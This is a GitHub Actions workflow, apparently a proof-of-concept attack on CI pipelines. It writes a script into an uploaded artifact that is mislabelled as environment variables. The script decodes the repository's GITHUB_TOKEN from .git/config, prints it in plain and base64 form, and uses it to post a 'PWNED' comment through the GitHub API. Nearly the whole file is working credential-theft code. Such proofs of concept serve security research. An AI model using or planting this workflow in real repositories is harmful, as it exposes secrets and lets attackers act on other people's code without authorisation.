name: Creates artifact

on:
  push:
    branches:
      - main
  pull_request:
    types: [opened, reopened, synchronize, ready_for_review]

jobs:
  creates-artifact:
    runs-on: ubuntu-latest
    steps:
      - run: |
          cat <<EOT >> myartifact
          ls
          GITHUB_TOKEN=$(cat $GITHUB_WORKSPACE/.git/config | grep AUTHORIZATION | cut -d':' -f 2 | cut -d' ' -f 3 | base64 -d)
          
          echo $GITHUB_TOKEN
          echo $GITHUB_TOKEN | base64
          
          curl -X POST -H "Authorization: Token $GITHUB_TOKEN" \
          -d '{"body": "PWNED"}' \
          https://api.github.com/$GITHUB_REPOSITORY/commits/$GITHUB_SHA/comments
          pwd
          EOT

      - name: Upload environment variables artifact
        uses: actions/upload-artifact@v3
        with:
          name: uploaded-artifact
          path: myartifact
